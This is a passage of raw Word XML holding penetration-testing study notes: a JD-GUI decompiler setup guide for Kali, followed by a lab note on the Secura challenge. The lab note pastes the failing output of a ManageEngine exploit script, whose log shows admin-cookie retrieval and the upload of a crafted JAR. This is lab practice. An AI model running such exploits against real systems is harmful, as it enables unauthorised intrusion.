      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/*.SF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003547">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/*.DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003548">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings META-INF/MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003549">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to Use JD-GUI on Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Visit the official JD-GUI site and download the Linux version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000354F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - http://java-decompiler.github.io/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003550">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003551">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Alternatively, use `wget` to download:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003552">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1275"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wget https://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003553">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003554">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. I</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nstall Java (if not already installed)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003555">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003556">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003557">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   sudo apt install openjdk-11-jdk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003558">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003559">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Launch JD-GUI using the downloaded `.jar` file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1121"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">java -jar jd-gui-1.6.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000355F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the `.jar` File</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003560">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Once JD-GUI opens, click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; Open File</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select your `.jar` file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003561">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - JD-GUI will display all the `.class` files within the archive in a tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003562">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003563">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Decompiled Code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003564">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Click on any `.class` file to view the decompiled Java source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003565">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - You can explore the logic and structure of the program easily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003566">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003567">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003568">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003569">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Secura Challenge Labs, I think we are supposed to use an exploit against Manage Engine that involves .jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1141">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, when I ran it, I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Visiting page to retrieve initial cookies...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Retrieving admin cookie...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000356F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Getting base directory of ManageEngine...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003570">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Found base directory: C:\Program Files\ManageEngine\AppManager14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003571">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Creating JAR file...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003572">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error: release version 7 not supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003573">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: javac &lt;options&gt; &lt;source files&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003574">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use --help for a list of possible options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003575">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">weblogic/jndi/*.class : no such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003576">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Uploading JAR file...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003577">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Traceback (most recent call last):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003578">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 449, in &lt;module&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003579">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    main(sys.argv[1:])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">    ~~~~^^^^^^^^^^^^^^</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000357B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  File "/home/kali/48793.py", line 416, in main</w:t>
      </w:r>
    </w:p>
